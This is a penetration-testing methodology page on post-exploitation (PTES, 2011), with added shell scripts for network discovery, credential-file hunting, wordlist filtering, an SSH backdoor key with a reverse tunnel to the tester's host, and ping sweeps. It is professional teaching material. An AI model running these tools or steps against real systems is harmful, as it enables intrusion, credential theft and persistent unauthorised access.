Post Exploitation Standard

From The Penetration Testing Execution Standard
Purpose
The purpose of the Post-Exploitation phase is to determine the value of the compromised machine and to maintain control of it for later use. The value of the machine is determined by the sensitivity of the data stored on it and by its usefulness in further compromising the network. The methods described in this phase are meant to help the tester identify and document sensitive data; identify configuration settings, communication channels and relationships with other network devices that can be used to gain further access to the network; and set up one or more methods of accessing the machine at a later time. In cases where these methods differ from the agreed upon Rules of Engagement, the Rules of Engagement must be followed.
 
Rules of Engagement
The following Rules of Engagement are specific to the Post-Exploitation phase of a penetration test and are intended to ensure that the client’s systems are not subjected to unnecessary risk by the (direct or indirect) actions of the testers and to ensure a mutually agreed procedure to follow during the post-exploitation phase of the project.
Protect the Client
 
    Unless previously agreed upon, there will be no modification of services which the client deems “critical” to their infrastructure.  The purpose of modifying such services would be to demonstrate to the client how an attacker may:
        Escalate privileges
        Gain access to specific data
        Cause denial of service
    All modifications, including configuration changes, executed against a system must be documented. After finishing the intended purpose of the modification, all settings should be returned to their original positions if possible. The list of changes should be given to the client after the engagement to allow them to ensure all changes were properly undone.
    A detailed log of actions taken against compromised systems must be kept.  The log should include the action taken and the time period in which it occurred.  Upon completion, this log should be included as an appendix to the final report.
    Any and all private and/or personal user data (including passwords and system history) uncovered during the course of the penetration test may be used as leverage to gain further permissions or to execute other actions related to the test only if the following conditions are met:
        The client’s Acceptable Use Policy states all systems are owned by the client and all data stored on those systems are the property of the client.
        The Acceptable Use Policy states connection to the client’s network is considered consent for the connected machine to be searched and analyzed (including all present data and configurations).
        The client has confirmation that all employees have read and understand the Acceptable Use Policy.
 
    Passwords (including those in encrypted form) will not be included in the final report.  This is done to safeguard the confidentiality of the users the passwords belong to, as well as to maintain the integrity of the systems they protect.
    Any method or device used to maintain access to compromised systems and that could affect the proper operation of the system or whose removal may cause downtime may not be implemented without the prior written consent of the client.
    Any method or device which is used to maintain access to compromised systems must employ some form of user authentication such as digital certificates or login prompts.  A reverse connection to a known controlled system is also acceptable.
    All data gathered by the testers must be encrypted on the systems used by the testers.
    All data gathered will be destroyed once the client has accepted the final report. Method used and proof of destruction will be provided to the client.
    If data gathered is regulated by any law, the systems used and their locations will be provided by the client to ensure that the data collected and processed does not violate any applicable laws. If the systems will be those of the penetration testing team the data may not be downloaded and stored on to their systems and only proof of access will be shown (File Permissions, Record Count, file names..etc).
    Third party services for password cracking will not be used, nor will any other type of data be shared with third parties without the client's prior consent.
    In case a compromise of a system by a third party is found, all logs of actions and times recorded during the assessment by the penetration testing team will be saved, hashed and provided to the client, and the client will determine whether an incident response plan should be put into effect.
    No logs should be cleared or altered unless the client has authorized this in the engagement contract/statement of work. If it is to be done, a proper backup of such logs must first be made.
 
Protecting Yourself
Due to the nature of a penetration test, you must ensure that you cover all your bases when dealing with the client and the tasks you will be performing. Discussions should take place with the client to clarify the following to ensure a clear understanding of the roles and responsibilities of both client and provider.
 
    Ensure that the contract and/or statement of work signed by both the client and the provider states that the actions taken on the systems being tested are on behalf of and in representation of the client.
    Require, prior to starting the engagement, that a copy of the security policies that govern user use of company systems and infrastructure is provided.  Verify that the policy covers:
 
        Personal use of equipment and storage of personal employee data on the client systems and ownership and rights on that data.
        Ownership of data stored on company equipment.
 
    Confirm regulations and laws that govern the data that is managed and used by the client on their systems and the restrictions imposed on such data.
    Use full drive encryption for those systems that will receive and store the clients data.
    Discuss and establish with the client the procedures to follow in the case that a compromise from a third party is found.
    Check for laws concerning the capture of audio and video, since the use of these methods in post-exploitation may be considered a violation of local or national wiretap laws.
 
Planning
Carlos is writing this section based on the CARVER method.
Environment Discovery
Network Configuration
The network configuration of a compromised machine can be used to identify additional subnets, network routers, critical servers, name servers and relationships between machines. This information can be used to identify additional targets or to compromise other machines. 
Interfaces
Identify all of the network interfaces on the machine along with their IP address, subnet mask, and gateway.
Routing
Identify all static and dynamic routes on the machine. For multi-homed machines determine if it is acting as a router.
DNS Servers
Identify all DNS servers in use.
Cached DNS Entries
Identify high value DNS entries in the cache, which may include login pages for Intranet sites, management interfaces, or external sites.
Proxy Servers
Identify network level and application level proxy servers.
ARP Entries
Enumerate cached and static ARP table entries, which can reveal other hosts that interact with the compromised machine. Static ARP entries may represent critical machines.
Network Services
Listening Services
Identify all the network services offered by the machine. This may lead to the discovery of services not identified by initial scanning as well as the discovery of other machines and networks. In addition, the tester may be able to leverage these services to compromise other machines. Most operating systems include a method of identifying TCP and UDP connections made to and from the machine.
 
By checking both connections to and from a compromised machine it is possible to find relationships that were previously unknown. In addition to the remote host, the service on the other end should also be considered: this may reveal services listening on non-standard ports and indicate trust relationships such as key-based (passwordless) authentication for SSH.
VPN Connections
All VPN connections into and out of the machine or network should be identified. Outbound connections can give a path in to new systems which may not previously have been identified. Both in and outbound can identify new systems and possible business relationships if the connection is from a customer/supplier etc.
Traffic inside a VPN tunnel generally bypasses firewalls and IDS/IPS, which cannot inspect what they cannot decrypt; this makes VPN connections ideal paths to launch attacks through.
If new targets are identified it should be confirmed as to whether they are in scope before launching attacks against them.
Directory Services
Need to fill this in.
Neighbors
Need to fill this in.
Network Layout (net view /domain)
Check the network neighbourhood / OS X browser (mDNS/Bonjour).
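The discovery steps above (interfaces, routes, DNS, ARP cache, listening services and connections), as an added example in POSIX shell for a compromised Linux/Unix host; this is not part of the PTES text. It uses only commands the host normally already has and logs anything missing as skipped instead of uploading a tool. Every command is recorded with a UTC timestamp in the action log that the Rules of Engagement require, and the log is hashed at the end so a copy can be handed to the client. The log path, the function names and the choice of commands are the example's own assumptions; Windows counterparts (ipconfig /all, route print, arp -a, netstat -ano, net view /domain) are not shown.

```bash
#!/bin/sh
# Added example (not part of the PTES text): living-off-the-land discovery of the
# network configuration of a compromised Linux/Unix host, recorded in the
# timestamped action log that the Rules of Engagement require.

LOG="${LOG:-./postex-actions.log}"   # assumed log location; keep it on the tester's encrypted system

# log_action MESSAGE: append one UTC-timestamped line to the action log.
log_action() {
    printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$*" >> "$LOG"
}

# run_logged SECTION CMD [ARGS...]: record the command, run it if the binary is
# present, and print its output under a header so the report stays readable.
run_logged() {
    section=$1; shift
    if command -v "$1" >/dev/null 2>&1; then
        log_action "RUN [$section] $*"
        printf '### %s: %s\n' "$section" "$*"
        "$@" 2>&1 || log_action "FAIL exit=$? [$section] $*"
    else
        log_action "SKIP [$section] $1 not found"
        printf '### %s: %s (not available)\n' "$section" "$1"
    fi
}

# discover_network: interfaces, routes, DNS, ARP cache, listening services and
# established connections, with a net-tools fallback for each iproute2 command.
discover_network() {
    log_action "BEGIN network discovery on $(hostname 2>/dev/null || uname -n)"
    run_logged interfaces ip -o addr show
    run_logged interfaces ifconfig -a
    run_logged routes ip route show
    run_logged routes netstat -rn
    run_logged dns cat /etc/resolv.conf
    run_logged hosts cat /etc/hosts
    run_logged arp ip neigh show
    run_logged arp arp -an
    run_logged listening ss -tulpn
    run_logged listening netstat -tulpn
    run_logged connections ss -tn state established
    run_logged proxy sh -c 'env | grep -i proxy || true'
    log_action "END network discovery"
}

# seal_log: hash the action log so the copy given to the client can be checked
# against the tester's copy (see the third-party-compromise rule above).
seal_log() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$LOG"
    else shasum -a 256 "$LOG"; fi
}

# Usage: sh discover.sh run > env-report.txt   (the log hash goes to stderr)
case "${1:-}" in
    run) discover_network; seal_log >&2 ;;
esac
```

Run it once per compromised host and keep the report, the log and its hash together; the FAIL and SKIP lines are themselves useful, since they document which tooling the host lacked and which reads were denied.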
Data Gathering
Pillaging talks to what information (files, links, documentation, etc.) the tester should be looking at using either as part of client requirements (personal information, credit card information etc.) or as part of the pivoting process to gain further access to the network. (matt)
Installed Programs
Startup Items
 
        List of applications and versions installed on the system.
        List of updates applied to the system.
 
 
Installed Services
Security Services
Firewall Status and ruleset.
 
HIPS, AV installed - Identifying countermeasures installed on a single compromised machine gives an idea of what to expect when targeting other machines in the network. It also gives an idea of what alerts may have been triggered during the test; these can be discussed with the client during the project debrief.
 
Security Policies, UAC, selinux, ipsec, windows security templates
File/Printer Shares
 
    File Server configurations by protocol (SMB, AFP). - The configuration files can be used to identify shares which are available, who has access to them and their permissions. This can help with gaining remote access to the shares and in gathering information which can be used in other areas of attack, for example username enumeration, which can also give hints on the roles of the users found.
    Shares offered by File Servers - Any file shares offered by target systems should be examined. Just by checking the names of the shares important information may be leaked, such as the names of internal applications or projects.
    Access Control Lists and permissions for shares. - From the client side, if it is possible to connect to the share, then it should be checked to see if the connection is read/only or read/write. Remember that if a share contains directories then different permissions may apply to different directories. From the server side both server configuration and file/directory permissions should be examined.
    Listing of content of shares
    Identification of files of interest (Source code, backups, installation files, confidential data..etc)
    Place Trojan files - Placing Trojans on popular shares can encourage network users to access them so triggering payloads.
    Place autorun files
 
Database Servers
 
    Databases
    Tables
    Table Content, row count for regulated content
    Permission
    Users, Passwords, Groups and Roles
 
Directory Servers
 
    List of objects (Users, passwords, Machines..etc)
 
Name Servers
 
    Enumerate allowed servers for zone transfer.
    Enumerate Records.
    Modify and Add Records.
 
Deployment Services
 
    Unattended answer files
    Permission on files
    Updates included
    Applications and versions
    Backdoor installation
 
Certificate Authority
 
    Root CA
    Enumerate the Certificate Revocation List
    Enumerate issued certificates
    Try to insert Root CA Certificate
    Export certificate with private key
 
Source Code Management Server
 
    Enumerate projects - The project names can give away sensitive information on company projects.
    Verify access to source code files
    Modify source code files - If it is allowed in scope then modifying source code proves that an attacker could make changes that would affect the system.
    Enumerate developers - Developers' details can be used for social engineering attacks as well as inputs for attacking other areas of the system.
    Enumerate configuration
 
Dynamic Host Configuration Server
 
    Enumerate leases given
    Enumerate configuration
    Enumerate Options
    Modify configuration
 
Virtualization
 
    Enumerate Virtual Machines (name, configurations, OS)
    Enumerate passwords and digital certificates for administration systems.
    Enumerate virtualization software configuration
 
Messaging
 
    ????
 
Monitoring and Management
 
    ???
 
Networking Services (RADIUS,TACACS..etc)
 
    ???
 
Sensitive Data
Key-logging
By monitoring key strokes it is possible to detect sensitive information including passwords and PII - Don’t know what the legality of this is if the user is say chatting on private IM while also using company software, anyone know? If the company says that all data on the network can be monitored then this should be ok.
If the second bullet point in Protect Yourself is present and it states that use of equipment can be monitored and no personal use is permitted, yes; if the policy does not cover personal use or ownership of data, no. It should be extended to cover the network also.
Screen capture
Network traffic capture
Previous Audit reports
User Information
In this section the main focus is on the information present on the target system related to user accounts either present on the system or that have connected remotely and have left some trace that the personnel performing the assessment can gather and analyze for further penetration or provide the desired goal of the assessment.
On System
 
    History files - History files store recent commands the user has executed. Reading through these can reveal system configuration information, important applications, data locations and other system sensitive information.
    Encryption Keys (SSH, PGP/GPG)
    Interesting Documents (.doc/x, .xls/x , password.*) - Users often store passwords and other sensitive information in clear text documents. These can be located in two ways, either searching through file names for interesting words, such as password.txt, or searching through the documents themselves. Indexing services can help with this, for example the Linux locate database.
    User specific application configuration parameters
    Individual Application History (MRU Windows only, history files..etc)
    Enumerate removable media
    Enumerate network shares / domain permission (gpresult)
 
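The "Interesting Documents" and "Encryption Keys" items above, as an added example in POSIX shell (not part of the PTES text): it locates candidate files under a directory first by name and then by content, and reports only path, size and match count. That is enough to prove access without copying regulated data to the tester's systems, as the Rules of Engagement require. The name patterns, the keyword regex and the function names are the example's own assumptions and should be extended per engagement.

```bash
#!/bin/sh
# Added example (not part of the PTES text): find candidate credential and
# configuration files by name, then by content, reporting metadata only.

# Assumed patterns; extend per engagement (keys, VPN/RDP profiles, office files).
NAME_PATTERNS='*password* *passwd* *.kdbx *.pem *.ppk *.key id_rsa id_dsa id_ecdsa id_ed25519
*.ovpn *.rdp .netrc .pgpass .my.cnf .git-credentials *.bash_history *.xls* *.doc*'
CONTENT_REGEX='password|passwd|secret|api[_-]?key|PRIVATE KEY'

# find_by_name DIR -> regular files whose name matches any pattern (case-insensitive)
find_by_name() {
    dir=$1; set --
    set -f                                  # patterns must reach find unexpanded
    for p in $NAME_PATTERNS; do set -- "$@" -o -iname "$p"; done
    set +f
    shift                                   # drop the leading -o
    find "$dir" -type f \( "$@" \) 2>/dev/null
}

# find_by_content DIR -> "path<TAB>bytes<TAB>matching_lines" for small files whose
# text mentions a credential keyword; binaries count as non-matching (grep -I).
find_by_content() {
    find "$1" -type f -size -2M 2>/dev/null | while IFS= read -r f; do
        n=$(grep -ciIE "$CONTENT_REGEX" "$f" 2>/dev/null || true)
        if [ "${n:-0}" -gt 0 ]; then
            printf '%s\t%s\t%s\n' "$f" "$(wc -c < "$f" | tr -d ' ')" "$n"
        fi
    done
}

# Usage: sh pillage.sh /home > files-of-interest.txt
if [ $# -ge 1 ]; then
    echo "### by name"; find_by_name "$1"
    echo "### by content (path, bytes, matching lines)"; find_by_content "$1"
fi
```

The content pass is deliberately limited to small files: large archives and databases are better handled by the Database Servers and Deployment Services checks, and reading them in full on the target is both slow and noisy.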
Web Browsers
 
    Browser History
    Bookmarks
    Download History
    Credentials
    Proxies
    Plugins/Extensions
 
IM Clients
 
    Enumerate Account Configuration (User, Password, Server, Proxy)
    Chat Logs
 
System Configuration
Password Policy
By enumerating the system's password policy, brute forcing and cracking passwords becomes much more efficient: for example, knowing that the minimum password length is 8 characters you can remove any word shorter than 8 characters from a dictionary.
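The dictionary pruning described above, as an added example in POSIX shell (not part of the PTES text). It generalises the length rule to the usual "minimum length plus N of 4 character classes" shape of a Windows complexity policy. The policy values, the sample wordlist and the function names are constructed for illustration; take the real values from `net accounts` on Windows or from /etc/login.defs and the PAM configuration on Linux.

```bash
#!/bin/sh
# Added example (not part of the PTES text): trim a wordlist to the candidates
# that could actually satisfy an enumerated password policy before cracking.

# filter_by_policy MINLEN CLASSES < wordlist > candidates
#   Keeps words of at least MINLEN characters containing at least CLASSES of the
#   four character classes (lower, upper, digit, other).
filter_by_policy() {
    awk -v minlen="$1" -v classes="$2" '
        length($0) >= minlen {
            n = 0
            if ($0 ~ /[[:lower:]]/) n++
            if ($0 ~ /[[:upper:]]/) n++
            if ($0 ~ /[[:digit:]]/) n++
            if ($0 ~ /[^[:alnum:]]/) n++
            if (n >= classes) print
        }'
}

# Constructed sample wordlist (not from the page) used by count_candidates.
SAMPLE='password
Password1
summer
Summer2011!
admin
P@ssw0rd
letmein
Welcome123'

# count_candidates MINLEN CLASSES -> how many sample words survive the policy;
# the ratio against the full list is what a cracking time estimate should use.
count_candidates() {
    printf '%s\n' "$SAMPLE" | filter_by_policy "$1" "$2" | wc -l | tr -d ' '
}

# Usage: sh policy-filter.sh 8 3 < wordlist.txt > candidates.txt
if [ $# -ge 2 ]; then
    filter_by_policy "$1" "$2"
fi
```

With the sample list, a policy of 8 characters and 3 classes halves the candidates; run the same filter before any mangling rules so the rules are not applied to words that can never pass.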
Security Policies
Configured Wireless Networks and Keys
By finding the target's wireless information it becomes possible to launch physical attacks through the company's wifi when on site. It can also allow a fake AP to be set up to lure targets to connect when away from site.
 
Data Exfiltration
 
Need someone to fill this in.
Maintaining Access
 
    Installation of backdoor that requires authentication.
    Installation and/or modification of services to connect back to system. User and complex password should be used as a minimum; use of certificates or cryptographic keys is preferred where possible. (SSH, ncat, RDP). Reverse connections limited to a single IP may be used.
    Creation of alternate accounts with complex passwords.
    When possible backdoor must survive reboots.
 
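A foothold that satisfies the list above and the later Cleanup requirements, as an added example in POSIX shell (not part of the PTES text): an SSH public key restricted with from="IP" so sshd accepts it only from one tester-controlled address, every change written to the action log, a backup kept for the client's verification, and a removal step that reverts only the line that was added and checks the result against the backup. The engagement tag, the allowed address, the paths and the function names are assumptions; persistence across reboots and the key on the tester's side are not shown.

```bash
#!/bin/sh
# Added example (not part of the PTES text): a key-based SSH foothold that
# authenticates, is usable only from one tester-controlled address, is logged,
# and can be reverted exactly at cleanup.

LOG="${LOG:-./postex-actions.log}"

# log_action MESSAGE: append one UTC-timestamped line to the action log.
log_action() {
    printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$*" >> "$LOG"
}

# install_backdoor_key AUTHORIZED_KEYS ALLOWED_IP PUBKEY_FILE TAG
# Appends the tester's public key restricted with from="ALLOWED_IP", tagged so
# cleanup can find it. A backup of the original file is kept for verification.
install_backdoor_key() {
    ak=$1; allowed_ip=$2; tag=$4
    key=$(head -n 1 "$3")
    if [ -f "$ak" ]; then
        cp -p "$ak" "$ak.postex-$tag.bak"
        log_action "BACKUP $ak -> $ak.postex-$tag.bak"
    else
        mkdir -p "$(dirname "$ak")"
        : > "$ak"; chmod 600 "$ak"
        log_action "CREATE $ak (did not exist)"
    fi
    printf 'from="%s",no-agent-forwarding,no-X11-forwarding %s postex:%s\n' \
        "$allowed_ip" "$key" "$tag" >> "$ak"
    log_action "ADD key restricted to $allowed_ip in $ak (postex:$tag)"
}

# reverse_tunnel_cmd USER@TESTER_HOST TESTER_PORT IDENTITY_FILE
# Prints the command the compromised host runs to open a reverse tunnel; the
# tester then reaches this host's sshd with `ssh -p TESTER_PORT user@localhost`
# on the tester box, whose own authorized_keys should restrict this key too.
reverse_tunnel_cmd() {
    printf 'ssh -i %s -N -f -o ExitOnForwardFailure=yes -o ServerAliveInterval=60 -R %s:127.0.0.1:22 %s\n' \
        "$3" "$2" "$1"
}

# remove_backdoor_key AUTHORIZED_KEYS TAG
# Removes only the tagged line, verifies the result against the backup, and
# deletes a file that we created and is now empty. A mismatch means the file
# changed during the engagement; the backup is left for the client to review.
remove_backdoor_key() {
    ak=$1; tag=$2; bak="$1.postex-$2.bak"; tmp="$1.postex-tmp"
    grep -v " postex:$tag\$" "$ak" > "$tmp" || true
    chmod 600 "$tmp" && mv "$tmp" "$ak"
    log_action "REMOVE postex:$tag key from $ak"
    if [ -f "$bak" ]; then
        if cmp -s "$bak" "$ak"; then
            rm -f "$bak"; log_action "VERIFIED $ak matches pre-engagement backup"
        else
            log_action "MISMATCH $ak differs from $bak; backup left for client review"
        fi
    elif [ ! -s "$ak" ]; then
        rm -f "$ak"; log_action "REMOVE $ak (created during engagement, now empty)"
    fi
}

# Usage: sh foothold.sh install AUTH_KEYS IP PUBKEY TAG
#        sh foothold.sh tunnel  USER@TESTER PORT IDENTITY
#        sh foothold.sh remove  AUTH_KEYS TAG
case "${1:-}" in
    install) shift; install_backdoor_key "$@" ;;
    tunnel)  shift; reverse_tunnel_cmd "$@" ;;
    remove)  shift; remove_backdoor_key "$@" ;;
esac
```

The tag in the key comment is what makes cleanup exact: the removal step never touches keys that were already there, and the VERIFIED or MISMATCH line in the log is the evidence to hand over with the list of changes.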
Gaining Further Access / Pivoting
Pivoting is the action in which the tester uses their presence on the compromised system to further enumerate and gain access to other systems on the client's infrastructure. This action can be executed from the compromised host itself using local resources or tools uploaded to the compromised system.
From Compromised System
 
    Upload tools
    Use local system tools
    ARP Scan
    Ping Sweep
    DNS Enumeration of internal network
    Directory Services Enumeration
    Brute force attacks
    Enumeration and Management through Management Protocols and compromised credentials (WinRM, WMI, SMB, SNMP..etc)
    Abuse of compromised credentials and keys (Webpages, Databases..etc)
    Execute Remote Exploits
 
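The "Use local system tools", "ARP Scan" and "Ping Sweep" items above, as an added example in POSIX shell (not part of the PTES text) for a compromised Linux host with nothing uploaded: the target range is expanded in shell arithmetic, each address gets one ICMP echo in parallel, and the ARP cache is read afterwards to catch hosts on the local segment that drop ICMP but answered ARP. The range and the function names are assumptions; confirm the range is in scope before sweeping, as the VPN section above requires for any newly identified target.

```bash
#!/bin/sh
# Added example (not part of the PTES text): host discovery from a compromised
# Linux host using only ping, ip/arp and the shell.

# ip_to_int A.B.C.D -> 32-bit integer (subshell body keeps the IFS change local)
ip_to_int() (
    IFS=.
    set -- $1
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
)

# int_to_ip INTEGER -> A.B.C.D
int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# cidr_hosts A.B.C.D/N -> one usable host address per line. Network and
# broadcast addresses are skipped except for /31 and /32.
cidr_hosts() {
    net=${1%/*}; bits=${1#*/}
    size=$(( 1 << (32 - bits) ))
    start=$(( $(ip_to_int "$net") & ~(size - 1) ))
    if [ "$bits" -ge 31 ]; then
        first=$start; last=$(( start + size - 1 ))
    else
        first=$(( start + 1 )); last=$(( start + size - 2 ))
    fi
    i=$first
    while [ "$i" -le "$last" ]; do
        int_to_ip "$i"
        i=$(( i + 1 ))
    done
}

# ping_sweep A.B.C.D/N -> addresses that answered one echo within a second.
# Probes run in parallel; -W is the Linux ping timeout in seconds.
ping_sweep() {
    for h in $(cidr_hosts "$1"); do
        ( ping -c 1 -W 1 "$h" >/dev/null 2>&1 && echo "$h" ) &
    done
    wait
}

# arp_neighbours -> IPv4 addresses with a resolved MAC in the ARP cache
arp_neighbours() {
    if command -v ip >/dev/null 2>&1; then
        ip -4 neigh show | awk '/lladdr/ { print $1 }'
    else
        arp -an | awk '{ gsub(/[()]/, "", $2); print $2 }'
    fi
}

# Usage: sh sweep.sh 10.0.0.0/24
if [ $# -ge 1 ]; then
    ping_sweep "$1" | sort -t . -k1,1n -k2,2n -k3,3n -k4,4n
    echo "### ARP cache after sweep"
    arp_neighbours
fi
```

A sweep of a /24 sends 254 packets in about a second, which is visible to any IDS watching the segment; for a quieter pass, sweep only the subnets that the routing table and ARP cache from Environment Discovery already showed the host talking to.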
Through Compromised System
 
    Port Forwarding
    Proxy to internal network (SSH)
    VPN to internal network
    Execute Remote Exploit
    Abuse of compromised credentials and keys (Webpages, Databases..etc)
 
Cleanup
The cleanup process covers the requirements for cleaning up systems once the penetration test has been completed. This will include all user accounts and binaries used during the test. (matt)
 
    Remove all executables, scripts and temporary files from a compromised system. If possible use a secure delete method for removing the files and folders.
    Return system settings and application configuration parameters to their original values if they were modified during the assessment.
    Remove all backdoors and/or rootkits installed.
    Remove any user accounts created for connecting back to compromised systems.

Revision as of 00:05, 12 April 2011